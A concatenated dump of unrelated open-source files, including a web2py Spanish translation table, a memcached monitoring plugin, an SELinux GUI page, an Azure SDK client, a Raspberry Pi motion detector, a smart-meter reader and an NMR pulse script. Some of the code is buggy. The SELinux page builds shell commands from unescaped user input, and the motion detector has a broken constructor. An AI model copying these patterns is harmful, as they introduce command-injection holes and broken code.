'to use the debugger!': '¡usar el debugger!',
'toggle breakpoint': 'alternar punto de ruptura',
'Toggle comment': 'Alternar comentario',
'Toggle Fullscreen': 'Alternar pantalla completa',
'Traceback': 'Rastreo',
'translation strings for the application': 'cadenas de caracteres de traducción para la aplicación',
'Translation strings for the application': 'Cadenas de caracteres de traducción para la aplicación',
'try': 'intente',
'try something like': 'intente algo como',
'Try the mobile interface': 'Pruebe la interfaz móvil',
'try view': 'Pruebe la vista',
'Type some Python code in here and hit Return (Enter) to execute it.': 'Escriba algún código Python aquí y teclee la tecla Enter para ejecutarlo',
'Unable to check for upgrades': 'No es posible verificar la existencia de actualizaciones',
'unable to create application "%s"': 'no es posible crear la aplicación "%s"',
'unable to delete file "%(filename)s"': 'no es posible eliminar el archivo "%(filename)s"',
'unable to delete file plugin "%(plugin)s"': 'no es posible eliminar plugin "%(plugin)s"',
'Unable to download': 'No es posible la descarga',
'Unable to download app': 'No es posible descargar la aplicación',
'Unable to download app because:': 'No es posible descargar la aplicación porque:',
'Unable to download because': 'No es posible descargar porque',
'unable to install application "%(appname)s"': 'unable to install application "%(appname)s"',
'unable to parse csv file': 'no es posible analizar el archivo CSV',
'unable to uninstall "%s"': 'no es posible instalar "%s"',
'unable to upgrade because "%s"': 'no es posible actualizar porque "%s"',
'uncheck all': 'desmarcar todos',
'Uninstall': 'desinstalar',
'update': 'actualizar',
'update all languages': 'actualizar todos los lenguajes',
'Update:': 'Actualice:',
'upgrade now to %s': 'upgrade now to %s',
'upgrade web2py now': 'actualize web2py ahora',
'Upload': 'Subir',
'Upload & install packed application': 'Suba e instale aplicación empaquetada',
'Upload a package:': 'Subir un paquete:',
'Upload and install packed application': 'Suba e instale una aplicación empaquetada',
'upload application:': 'subir aplicación:',
'Upload existing application': 'Suba esta aplicación',
'upload file:': 'suba un archivo:',
'upload plugin file:': 'suba un archivo de plugin:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) para AND, (...)|(...) para OR, y ~(...) para NOT, para crear consultas más complejas.',
'User ID': 'ID de Usuario',
'variables': 'variables',
'Version': 'Versión',
'versioning': 'versiones',
'Versioning': 'Versiones',
'view': 'vista',
'Views': 'Vistas',
'views': 'vistas',
'Web Framework': 'Web Framework',
'web2py is up to date': 'web2py está actualizado',
'web2py online debugger': 'web2py debugger en línea',
'web2py Recent Tweets': 'Tweets Recientes de web2py',
'web2py upgraded; please restart it': 'web2py actualizado; favor reiniciar',
'Welcome to web2py': 'Bienvenido a web2py',
'YES': 'SÍ',
'Yes': 'Sí',
'You are going to install': 'Vas a instalar',
'You can inspect variables using the console below': 'Puedes inspeccionar las variables utilizando la terminal de abajo',
'You need to set up and reach a': 'Necesitas configurar y obtener un',
'Your application will be blocked until you click an action button (next, step, continue, etc.)': 'Tu aplicación será bloqueada hasta que des click en un botón de acción (siguiente, paso, continuar, etc.)',
}
| gpl-3.0 | -3,982,503,381,662,950,400 | 51.746421 | 700 | 0.721359 | false |
kadashu/satori | satori-rules/plugin/memcache/60_memcache.py | 1 | 1626 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# -- stdlib --
import json
import socket
import subprocess
import telnetlib
import time
# -- third party --
# -- own --
# -- code --
ts = int(time.time())
proc = subprocess.Popen(['/bin/bash', '-c', r'''ps -ef |grep memcached|grep -v grep |sed -n 's/.* *-p *\([0-9]\{1,5\}\).*/\1/p' '''], stdout=subprocess.PIPE)
ports = map(int, proc.stdout.read().strip().split())
rst = []
for port in ports:
try:
conn = telnetlib.Telnet('0.0.0.0', port)
conn.write('stats\r\nquit\r\n')
lines = conn.read_until('END')
lines = lines.split('\r\n')
assert lines[-1] == 'END'
conn.close()
except Exception:
continue
stats = dict([i.split(' ', 2)[1:] for i in lines[:-1]])
[stats.pop(i, '') for i in ('pid', 'uptime', 'version', 'libevent', 'time')]
stats = {k: float(v) for k, v in stats.items()}
stats['usage'] = 100 * stats['bytes'] / stats['limit_maxbytes']
def add_ratio(a, b):
try:
stats[a + '_ratio'] = 100 * stats[a] / (stats[a] + stats[b])
except ZeroDivisionError:
stats[a + '_ratio'] = 0
add_ratio('get_hits', 'get_misses')
add_ratio('incr_hits', 'incr_misses')
add_ratio('decr_hits', 'decr_misses')
add_ratio('delete_hits', 'delete_misses')
add_ratio('cas_hits', 'cas_misses')
add_ratio('touch_hits', 'touch_misses')
rst.extend([{
'metric': 'memcached.%s' % k,
'timestamp': ts,
'step': 60,
'value': v,
'tags': {'port': str(port)},
} for k, v in stats.items()])
print json.dumps(rst)
| apache-2.0 | 3,021,739,656,081,259,500 | 25.655738 | 157 | 0.53936 | false |
jpacg/su-binary | jni/selinux/gui/usersPage.py | 1 | 5487 | ## usersPage.py - show selinux mappings
## Copyright (C) 2006,2007,2008 Red Hat, Inc.
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
## Author: Dan Walsh
import string
import gtk
import gtk.glade
import os
import gobject
import sys
try:
from subprocess import getstatusoutput
except ImportError:
from commands import getstatusoutput
import seobject
from semanagePage import *
##
## I18N
##
PROGNAME = "policycoreutils"
try:
import gettext
kwargs = {}
if sys.version_info < (3,):
kwargs['unicode'] = True
gettext.install(PROGNAME,
localedir="/usr/share/locale",
codeset='utf-8',
**kwargs)
except:
try:
import builtins
builtins.__dict__['_'] = str
except ImportError:
import __builtin__
__builtin__.__dict__['_'] = unicode
class usersPage(semanagePage):
def __init__(self, xml):
semanagePage.__init__(self, xml, "users", _("SELinux User"))
self.store = gtk.ListStore(gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING, gobject.TYPE_STRING)
self.view.set_model(self.store)
self.store.set_sort_column_id(0, gtk.SORT_ASCENDING)
col = gtk.TreeViewColumn(_("SELinux\nUser"), gtk.CellRendererText(), text=0)
col.set_sort_column_id(0)
col.set_resizable(True)
self.view.append_column(col)
col = gtk.TreeViewColumn(_("MLS/\nMCS Range"), gtk.CellRendererText(), text=1)
col.set_resizable(True)
self.view.append_column(col)
col = gtk.TreeViewColumn(_("SELinux Roles"), gtk.CellRendererText(), text=2)
col.set_resizable(True)
self.view.append_column(col)
self.load()
self.selinuxUserEntry = xml.get_widget("selinuxUserEntry")
self.mlsRangeEntry = xml.get_widget("mlsRangeEntry")
self.selinuxRolesEntry = xml.get_widget("selinuxRolesEntry")
def load(self, filter=""):
self.filter = filter
self.user = seobject.seluserRecords()
dict = self.user.get_all()
self.store.clear()
for k in sorted(dict.keys()):
range = seobject.translate(dict[k][2])
if not (self.match(k, filter) or self.match(dict[k][0], filter) or self.match(range, filter) or self.match(dict[k][3], filter)):
continue
iter = self.store.append()
self.store.set_value(iter, 0, k)
self.store.set_value(iter, 1, range)
self.store.set_value(iter, 2, dict[k][3])
self.view.get_selection().select_path((0,))
def delete(self):
if semanagePage.delete(self) == gtk.RESPONSE_NO:
return None
def dialogInit(self):
store, iter = self.view.get_selection().get_selected()
self.selinuxUserEntry.set_text(store.get_value(iter, 0))
self.selinuxUserEntry.set_sensitive(False)
self.mlsRangeEntry.set_text(store.get_value(iter, 1))
self.selinuxRolesEntry.set_text(store.get_value(iter, 2))
def dialogClear(self):
self.selinuxUserEntry.set_text("")
self.selinuxUserEntry.set_sensitive(True)
self.mlsRangeEntry.set_text("s0")
self.selinuxRolesEntry.set_text("")
def add(self):
user = self.selinuxUserEntry.get_text()
range = self.mlsRangeEntry.get_text()
roles = self.selinuxRolesEntry.get_text()
self.wait()
(rc, out) = getstatusoutput("semanage user -a -R '%s' -r %s %s" % (roles, range, user))
self.ready()
if rc != 0:
self.error(out)
return False
iter = self.store.append()
self.store.set_value(iter, 0, user)
self.store.set_value(iter, 1, range)
self.store.set_value(iter, 2, roles)
def modify(self):
user = self.selinuxUserEntry.get_text()
range = self.mlsRangeEntry.get_text()
roles = self.selinuxRolesEntry.get_text()
self.wait()
(rc, out) = getstatusoutput("semanage user -m -R '%s' -r %s %s" % (roles, range, user))
self.ready()
if rc != 0:
self.error(out)
return False
self.load(self.filter)
def delete(self):
store, iter = self.view.get_selection().get_selected()
try:
user = store.get_value(iter, 0)
if user == "root" or user == "user_u":
raise ValueError(_("SELinux user '%s' is required") % user)
self.wait()
(rc, out) = getstatusoutput("semanage user -d %s" % user)
self.ready()
if rc != 0:
self.error(out)
return False
store.remove(iter)
self.view.get_selection().select_path((0,))
except ValueError as e:
self.error(e.args[0])
| gpl-2.0 | 2,246,079,205,972,420,400 | 33.080745 | 140 | 0.609805 | false |
Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/templatespecs/v2021_05_01/aio/_template_specs_client.py | 1 | 4199 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import TemplateSpecsClientConfiguration
from .operations import TemplateSpecsOperations
from .operations import TemplateSpecVersionsOperations
from .. import models
class TemplateSpecsClient(object):
"""The APIs listed in this specification can be used to manage Template Spec resources through the Azure Resource Manager.
:ivar template_specs: TemplateSpecsOperations operations
:vartype template_specs: azure.mgmt.resource.templatespecs.v2021_05_01.aio.operations.TemplateSpecsOperations
:ivar template_spec_versions: TemplateSpecVersionsOperations operations
:vartype template_spec_versions: azure.mgmt.resource.templatespecs.v2021_05_01.aio.operations.TemplateSpecVersionsOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: Subscription Id which forms part of the URI for every service call.
:type subscription_id: str
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = TemplateSpecsClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.template_specs = TemplateSpecsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.template_spec_versions = TemplateSpecVersionsOperations(
self._client, self._config, self._serialize, self._deserialize)
async def _send_request(self, http_request: HttpRequest, **kwargs: Any) -> AsyncHttpResponse:
"""Runs the network request through the client's chained policies.
:param http_request: The network request you want to make. Required.
:type http_request: ~azure.core.pipeline.transport.HttpRequest
:keyword bool stream: Whether the response payload will be streamed. Defaults to True.
:return: The response of your network call. Does not do error handling on your response.
:rtype: ~azure.core.pipeline.transport.AsyncHttpResponse
"""
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
http_request.url = self._client.format_url(http_request.url, **path_format_arguments)
stream = kwargs.pop("stream", True)
pipeline_response = await self._client._pipeline.run(http_request, stream=stream, **kwargs)
return pipeline_response.http_response
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "TemplateSpecsClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| mit | 2,766,160,840,868,600,000 | 47.825581 | 128 | 0.69207 | false |
opieters/wcamera | src/motion_detector.py | 1 | 5950 | #!/usr/bin/env python
# this code was inspired by this tutorial by Adrian Rosebrock:
# http://www.pyimagesearch.com/2015/06/01/home-surveillance-and-motion-detection-with-the-raspberry-pi-python-and-opencv/
import time, datetime, json, cv2, warnings
import RPi.GPIO as GPIO
from argparse import ArgumentParser
from imutils import resize
from picamera.array import PiRGBArray
from picamera import PiCamera, PiCameraError
from threading import Timer
# global objects
class MD:
def __init__(camera, conf):
"""Initialise module for recording with configuration file_conf or
conf.json if unspecified.
"""
self.conf = conf
self.camera = camera
self.run_complete = False
# filter warnings
warnings.filterwarnings("ignore")
# create and configure camera object
self.camera.resolution = tuple(conf["detection resolution"])
self.camera.framerate = self.conf["fps"]
# define all 'private' methods
def reset_variables(self):
"""Reset all variables to default values."""
self.run_complet = False
def delete(self):
"""Release all nessesary veriables and stop timers."""
if self.conf["show video"]:
cv2.destroyAllWindows()
# clean GPIO pins
if self.conf["stop detection GPIO pin"] >= 0:
GPIO.cleanup(self.conf["stop detection GPIO pin"])
def run_timer_callback(self,pin):
""""""
self.run_complete = True
def run(self,duration=None):
"""Perform motion detecton."""
self.reset_variables()
# warming up camera
print "[INFO] warming up..."
time.sleep(self.conf["camera warmup time"])
avg_frame = None
rawCapture = PiRGBArray(self.camera, size=tuple(self.conf["resolution"]))
# limit recording duration if needed
if self.conf["duration"] > 0:
run_timer = Timer(self.conf["duration"], stop_recording_callback)
run_timer.start()
else:
run_timer = None
# setup GPIO pin to stop run on event
if self.conf["stop detection GPIO pin"] >= 0:
GPIO.setup(self.conf["stop detection GPIO pin", GPIO.IN])
GPIO.add_event_detect(self.conf["stop detection GPIO pin"], GPIO.BOTH, callback=self.run_timer_callback)
try:
# loop over frames
for raw_frame in self.camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
# capture current frame
frame = raw_frame.array
timestamp = datetime.datetime.now()
# resize, convert to grayscale and blur (less noise)
frame = resize(frame, width=self.conf["detection width"])
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, tuple(self.conf["motion blur kernel size"]), self.conf["motion blur std x"])
# init average frame
if avg_frame is None:
print("[INFO] Starting background model...")
avg_frame = gray.copy().astype("float")
rawCapture.truncate(0)
continue
# update background frame
cv2.accumulateWeighted(gray, avg_frame, self.conf["motion dection average weight"])
# compute difference of current and average frame and detect values above threshold
frame_diff = cv2.absdiff(gray, cv2.convertScaleAbs(avg_frame))
frame_thr = cv2.threshold(frame_diff, self.conf["motion threshold"], 255, cv2.THRESH_BINARY)[1]
# fill holes (dilate) in image and find countours on threshold image
frame_thr = cv2.dilate(frame_thr, None, iterations=2)
(cnts,_) = cv2.findContours(frame_thr.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
# default: no motion
motion = False
# loop over contours (try to find motion)
for c in cnts:
# ignore contour if too small
if cv2.contourArea(c) < self.conf["motion min area"]:
continue
motion = True
# no annotations, leave frame as is
if not self.conf["annotations"]:
break
# compute contour bouding box and draw on frame
(x,y,w,h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x,y), (x+w, y+h), (0, 255, 0), 2)
# draw timestamp on frame
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
break
# if motion has been detected, save frame to file
if motion:
timestamp_txt = timestamp.strftime("%x-%X")
print("[INFO] Motion detected at " + timestamp_txt)
cv2.imwrite(self.conf["directory"] + "motion-" + timestamp_txt, frame)
# show frame and record if user pressed key
if self.conf["show video"]:
cv2.imshow("Security Feed",frame)
cv2.imshow("Thresh",frame_thr)
cv2.imshow("Frame Delta",frame_diff)
# cleanup (go to most recent frame)
rawCapture.truncate(0)
# stop for-loop if needed
if self.run_complete:
break
except KeyboardInterrupt:
print("[INFO] Motion detection stopped.")
except PiCameraError:
print("[ERROR] Camera error... Stopped detection.")
# clean timer if set
if run_timer is not None:
run_timer.cancel()
run_timer.join()
| mit | -4,295,866,812,982,044,000 | 36.898089 | 157 | 0.564706 | false |
lorenzogil/yith-library-server | yithlibraryserver/tests/test_locale.py | 1 | 1557 | # Yith Library Server is a password storage server.
# Copyright (C) 2012-2013 Lorenzo Gil Sanchez <[email protected]>
#
# This file is part of Yith Library Server.
#
# Yith Library Server is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Yith Library Server is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Yith Library Server. If not, see <http://www.gnu.org/licenses/>.
import datetime
import unittest
from yithlibraryserver.locale import DatesFormatter
class DatesFormatterTests(unittest.TestCase):
def test_date(self):
df_en = DatesFormatter('en')
df_es = DatesFormatter('es')
date = datetime.date(2012, 12, 12)
self.assertEqual(df_en.date(date), 'Dec 12, 2012')
self.assertEqual(df_es.date(date), '12 dic. 2012')
def test_datetime(self):
df_en = DatesFormatter('en')
df_es = DatesFormatter('es')
date = datetime.datetime(2012, 12, 12, 12, 12, 12)
self.assertEqual(df_en.datetime(date), 'Dec 12, 2012, 12:12:12 PM')
self.assertEqual(df_es.datetime(date), '12 dic. 2012 12:12:12')
| agpl-3.0 | -2,328,418,225,493,275,600 | 35.209302 | 78 | 0.708414 | false |
Fodij/ZonStroom | read/P1tofiles.py | 1 | 8337 | #!/usr/bin/python
versie = 1.0
from datetime import datetime, timedelta
import re
import serial
import sys
from metingen import meting
# --- Meter lees informatie ---
# Maximum aantal regels dat gelezen mag worden
# dient om programma te stoppen wanneer er geen 'eofline' voorbij komt
maxlines = 30
# Einde van bericht regel
eofline = '!'
# Aantal verwachte regels (verschilt per slimme meter type)
expectedlines = 17
# Header van het datagram voor deze meter
# let op de r aan het begin om te voorkomen dat \ als escape
# character wordt gebruikt
meteridentification = r"/ISk5\2ME382-1003"
# --- Bestands informatie ---
# Bestand met vorige meting
root_dir = '/usr/local/P1tools/database'
if root_dir[-1] != '/':
root_dir = root_dir + '/'
vorige_meting_bestand = 'vorige_meting'
# Informatie die de meter oplevert
meterinfo = [
'meter_id',
'gebruikt1',
'gebruikt2',
'geleverd1',
'geleverd2',
'huidigtarief',
'vermogen_in',
'vermogen_uit',
'max_vermogen',
'stroom_hoofdschakelaar',
'tekst_code',
'tekst',
'device_type',
'gas_meter_id',
'gas_meetdatum',
'gas_hoofdschakelaar',
'gas_gebruik',
'datum_tijd'
]
# Herkenningsstrings voor meter informatie
meteruitvoerformaat_list = [
'0-0:96.1.1',
'1-0:1.8.1',
'1-0:1.8.2',
'1-0:2.8.1',
'1-0:2.8.2',
'0-0:96.14.0',
'1-0:1.7.0',
'1-0:2.7.0',
'0-0:17.0.0',
'0-0:96.3.10',
'0-0:96.13.1',
'0-0:96.13.0',
'0-1:24.1.0',
'0-1:96.1.0',
'0-1:24.3.0',
'0-1:24.4.0',
'(',
'Not applicable'
]
meteruitvoerformaat = dict(zip(meterinfo,meteruitvoerformaat_list))
meteruitvoer_waarden = [
'gebruikt1','gebruikt2','geleverd1',
'geleverd2','vermogen_in','vermogen_uit',
'max_vermogen','gas_gebruik'
]
##############################################################################
# Lees meterinformatie
##############################################################################
def lees_meter():
#Stel de seriele poort in
ser = serial.Serial()
ser.baudrate = 9600
ser.bytesize=serial.SEVENBITS
ser.parity=serial.PARITY_EVEN
ser.stopbits=serial.STOPBITS_ONE
# Hopelijk helpt dit om complete boodschappen te krijgen
# was bij 0 een probleem. cu heeft dit echter standaard aan staan
# en daar trad dit probleem niet op
ser.xonxoff=1
ser.rtscts=0
# timeout voor het wachten op invoer
# er moet elke 10 seconden een bericht komen
ser.timeout=12
# Seriele poort waar p1 naar USB interface op zit
ser.port="/dev/ttyUSB0"
#Open seriele poort
try:
ser.open()
except:
sys.exit ("Fout bij het openen van seriele poort %s" % ser.name)
p1_output = []
nlines = 0
nparsedlines = 0
header = False
while (nlines < maxlines):
try:
line = str(ser.readline()).strip()
nlines = nlines + 1
# Eerst moet er een header komen.
# Voorkomt dat we incomplete datagrammen parsen
if not header:
if line == meteridentification:
header = True
else:
if line == eofline:
break
elif line != '':
p1_output.append(line)
nparsedlines = nparsedlines + 1
except:
sys.exit ("Kon seriele poort niet openen")
#Close port and show status
try:
ser.close()
except:
sys.exit ("Programma afgebroken. Kon de seriele poort %s niet sluiten." % ser.name )
# Initialiseer dictionary met datum van de meting
meteruitvoer={'datum_tijd':datetime.now()}
# Parse de meter uitvoer
for line in p1_output:
#DEBUG print line
for key in meteruitvoerformaat:
if line.startswith(meteruitvoerformaat[key]):
meteruitvoer[key] = line[line.find('(')+1:line.find(')')]
for key in meteruitvoer_waarden:
try:
meteruitvoer[key] = float(re.sub('[^0-9\.]', '', meteruitvoer[key]))
except KeyError:
sys.exit("Missende invoer vanuit meter, waarschijnlijk probleem met seriele poort")
# DEBUG
# for key in meteruitvoer:
# print key + ': ' + str(meteruitvoer[key])
if nparsedlines != expectedlines:
sys.exit("ERROR: aantal regels (%i) is anders dan verwacht (%i)!" % (nparsedlines,expectedlines))
return meteruitvoer
def lees_vorige_meting(huidige_meting):
# Lees de vorige meting
vorige_meting = {}
try:
with open(root_dir + vorige_meting_bestand,'r') as f:
for line in f:
for key in meteruitvoerformaat:
if line.startswith(key + ':'):
vorige_meting[key] = line[line.find(':')+1:-1]
except IOError:
pass
if vorige_meting == {}:
vorige_meting = huidige_meting
else:
for key in meteruitvoer_waarden:
vorige_meting[key] = float(vorige_meting[key])
vorige_meting['datum_tijd'] = datetime.strptime(vorige_meting['datum_tijd'], "%Y-%m-%d %H:%M:%S.%f")
return vorige_meting
def schrijf_vorige_meting(meteruitvoer):
# Schrijf de vorige meting
try:
with open(root_dir + vorige_meting_bestand,'w') as f:
for key in meteruitvoer:
f.write(key + ':' + str(meteruitvoer[key]) + '\n')
except IOError:
sys.exit('Probleem met wegschrijven huidige meting als vorige meting')
def maak_stroommeting(meteruitvoer):
stroommeting = meting([meteruitvoer['gebruikt1'], meteruitvoer['gebruikt2'], meteruitvoer['geleverd1'], meteruitvoer['geleverd2']],
["meettijd" ,"gebruikt1" ,"gebruikt2" ,"geleverd1" ,"geleverd2",
"vermogen1_in","vermogen2_in","vermogen1_uit","vermogen2_uit" ],
meteruitvoer['datum_tijd'], delta = True)
return stroommeting
def maak_gasmeting(meteruitvoer):
gasmeting = meting([meteruitvoer['gas_gebruik']],
["meettijd", "gebruik", "m3/u"],
datetime.strptime(meteruitvoer["gas_meetdatum"], "%y%m%d%H%M%S"),delta = True)
return gasmeting
def maak_vermogenmeting(meteruitvoer):
vermogenmeting = meting([meteruitvoer['vermogen_in'],
meteruitvoer['vermogen_uit']],
['meettijd','vermogen_in','vermogen_uit'],meteruitvoer['datum_tijd'])
return vermogenmeting
def maak_overigemeting(meteruitvoer):
overigemeting = meting([meteruitvoer['meter_id'],meteruitvoer['huidigtarief'],meteruitvoer['max_vermogen'],
meteruitvoer['stroom_hoofdschakelaar'],meteruitvoer['tekst_code'],meteruitvoer['tekst'],
meteruitvoer['device_type'],meteruitvoer['gas_meter_id'],meteruitvoer['gas_hoofdschakelaar']],
['meettijd','meterid','huidigtarief','max_vermogen','stroom_hoofdschakelaar','tekst_code','tekst',
'device_type','gas_meter_id','gas_hoofdschakelaar'],
meteruitvoer['datum_tijd'], verschillend = True)
return overigemeting
def main():
# Lees meter uitvoer en zet om naar dictionary
huidige_meting = lees_meter()
# Lees de vorige meting in
vorige_meting = lees_vorige_meting(huidige_meting)
# Definieer de elektriciteits meting
stroommeting = maak_stroommeting(huidige_meting)
vorige_stroommeting = maak_stroommeting(vorige_meting)
# Definieer de gas meting
gasmeting = maak_gasmeting(huidige_meting)
vorige_gasmeting = maak_gasmeting(vorige_meting)
# Definieer de vermogen meting
vermogenmeting = maak_vermogenmeting(huidige_meting)
vorige_vermogenmeting = maak_vermogenmeting(vorige_meting)
# Definieer de overige info
overigemeting = maak_overigemeting(huidige_meting)
vorige_overigemeting = maak_overigemeting(vorige_meting)
# Schrijf de stroommeting
stroommeting.schrijf_alles(vorige_stroommeting, root_dir, '.stroom')
# Schrijf de gasmeting
gasmeting.schrijf_alles(vorige_gasmeting, root_dir, '.gas')
# Schrijf de vermogen meting
vermogenmeting.schrijf_alles(vorige_vermogenmeting, root_dir, '.vermogen')
# Schrijf de overige meetwaarden
overigemeting.schrijf_alles(vorige_overigemeting, root_dir, '.overig')
# Schrijf een nieuwe vorige meting
schrijf_vorige_meting(huidige_meting)
if __name__ == "__main__":
main()
| gpl-2.0 | -2,265,219,109,054,684,700 | 31.189189 | 134 | 0.623006 | false |
mrosenstihl/PulsePrograms | autoPFGMASSEY/auto-PFG-MASSEY_exp.py | 1 | 5445 | import numpy as N
class ParameterSet:
"""
From
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52308
Alex Martelli
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
def MASSEY(**parameter_set):
e=Experiment()
for key in parameter_set.keys():
e.set_description(key,parameter_set[key])
par = ParameterSet(**parameter_set)
e.set_frequency(par.frequency,0) # needs 2 microseconds Phase
ph1 = 0
ph2 = 90
rec_ph=120
############ PFG sequence #############
e.set_phase(ph1) # phase 1
e.wait(par.repetition_time)
e.ttl_pulse(par.gate, value=1) # gate 2**0
e.ttl_pulse(par.pi/2, value=3) # gate+rf 2**0+2**1
e.set_phase(ph2) # Phase 2
e.wait((par.tau-par.delta)/2-0.5e-6-3.8e-6)
########## sin**2 gradient ##########
#for i in xrange(par.points):
# e.set_pfg(dac_value=int(par.dac*N.sin(i*N.pi/par.points)**2),length=par.delta/par.points, is_seq=1) # pfg 1
#e.set_pfg(dac_value=0)
e.set_pfg(dac_value=par.dac, length=par.delta, shape=('sin2',20e-6))
e.wait((par.tau-par.delta)/2-par.read_length-150e-6)
e.set_pfg(dac_value=par.read_gradient, length=par.read_length)
e.wait(150e-6) # keeping distance to pulse
e.ttl_pulse(par.gate, value=1) # gate 2**0
e.ttl_pulse(par.pi, value=3) # gate+rf 2**0+2**1
e.set_phase(rec_ph) # rec phase
e.wait((par.tau-par.delta)/2-0.5e-6-3.8e-6)
########## sin**2 gradient ##########
#for i in xrange(par.points):
# e.set_pfg(dac_value=int(par.dac*N.sin(i*N.pi/par.points)**2),length=par.delta/par.points, is_seq=1) # pfg 1
#e.set_pfg(dac_value=0)
e.set_pfg(dac_value=par.dac, length=par.delta, shape=('sin2',20e-6))
if par.echo_shift > (par.tau-par.delta)/2:
raise
#e.wait(1e-3)
e.wait((par.tau-par.delta)/2-par.echo_shift)
e.set_pfg(dac_value=par.read_gradient,length=5e-6, is_seq=1)
e.record(par.samples, par.samplerate, par.sensitivity)
e.set_pfg(dac_value=0)
return e
def experiment():
starttime = 1e-3
endtime = 7e-3
points = 5
T1= 0.0002
rep_time = 5*T1
tips =log_range(starttime,endtime,points)
timepoints = [i for i in tips]
timepoints = [3e-3]#[10e-3]
dac_values = N.arange(0, 300001, 30000)
no_akku=1
bvt = 285
tmp=279
print "Estimated time (h):", len(timepoints)*len(dac_values)*no_akku*rep_time/3600.0
for tp in timepoints: # timepoints
# First we need the Echo position WITHOUT PFGs
for akku in xrange(no_akku): # Accumulations
yield MASSEY(
pi = 3.4e-6,
gate = 5e-6,
frequency = 300.03385e6,
samplerate = 0.20e6,
sensitivity = 0.2,
samples = 8*1024,
tau = tp,
repetition_time = rep_time,
delta = 2e-3,
points = 40,
dac = 0,
read_gradient = 0,
read_length=0.2e-3,
akku = akku,
no_akku = no_akku,
echo_shift = 0.35e-3,
bvt_temp=bvt,
temperature=tmp,
spectrum = "original")
synchronize() # making sure that the echo position is indeed determined and saved
# Doing now exactly one phase cycle to find the current echo position for each applied gradient
for dv in dac_values:
synchronize()
for akku in xrange(16): # Accumulations
yield MASSEY(
pi = 3.4e-6,
gate = 5e-6,
frequency = 300.03385e6,
samplerate = 0.20e6,
sensitivity = 0.2,
samples = 8*1024,
tau = tp,
repetition_time = rep_time,
delta = 2e-3,
points = 40,
dac = int(dv),
read_gradient =int(50e-3/6.7e-5),
read_length=0.4e-3,
akku = akku,
no_akku = 16,
echo_shift = 0.35e-3,
bvt_temp=bvt,
temperature=tmp,
spectrum = "test")
synchronize()
# Read in the correction data
correction = pickle.read('.correction_data')
for akku in xrange(no_akku): # Accumulations
yield MASSEY(
pi = 3.4e-6,
gate = 5e-6,
frequency = 300.03385e6,
samplerate = 0.20e6,
sensitivity = 0.2,
samples = 8*1024,
tau = tp,
repetition_time = rep_time,
delta = 2e-3,
points = 40,
dac = int(dv),
read_gradient =int(50e-3/6.7e-5),
read_length=0.2e-3+correction,
akku = akku,
no_akku = no_akku,
echo_shift = 0.35e-3,
bvt_temp=bvt,
temperature=tmp,
spectrum = "final") | bsd-2-clause | -43,041,400,716,493,464 | 35.797297 | 116 | 0.474564 | false |
nextgis-extra/tests | lib_gdal/gdrivers/ndf.py | 1 | 2985 | #!/usr/bin/env python
###############################################################################
# $Id: ndf.py 32163 2015-12-13 17:44:50Z goatbar $
#
# Project: GDAL/OGR Test Suite
# Purpose: Test NLAPS/NDF driver.
# Author: Frank Warmerdam <[email protected]>
#
###############################################################################
# Copyright (c) 2008, Frank Warmerdam <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
